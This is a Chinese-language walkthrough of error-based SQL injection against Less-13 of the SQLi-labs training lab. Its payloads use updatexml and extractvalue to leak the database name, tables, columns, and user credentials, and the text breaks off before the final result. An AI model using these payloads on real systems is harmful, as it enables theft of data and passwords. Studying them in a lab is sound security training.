sql_lab之sqli中的报错注入，less13

报错注入（less-13）

正常报错注入：

1.输入用户名和密码123 123显示登录错误

2.输入用户名和密码123’?123显示登录错误

123后面有’)说明是’)注入

3.查询数据库名

1')?and updatexml('<a><b></b></a>',concat('1111',database(),'1'),'1')?-- s

爆出XPATH syntax error: 'security1'

或者用1') and extractvalue('1',concat('1',database())) -- s

爆出XPATH syntax error: 'security'

4.查询表名

1') and extractvalue('1',concat('1',(select group_concat(table_name) from information_schema.tables where table_schema='SECURITY'))) -- s

5.查询users用户的字段名

1') and extractvalue('1',concat('1',(select group_concat(column_name) from information_schema.columns where table_schema='SECURITY' and table_name='users'))) -- s

6.查询username和password

输入这个

1') and extractvalue('1',concat('1',(select group_concat(username) from users))) -- s

Username结果显示

同理

1') and extractvalue('1',concat('1',(select group_concat(password) from users))) -- s

Password结果显示

注意该结果只能显示一行，所以说需要username和password分开查询，否则会出现错误

比如：

=1') and extractvalue('1',concat('1',(select group_concat(username),group_concat(password) from users))) -- s

结果为：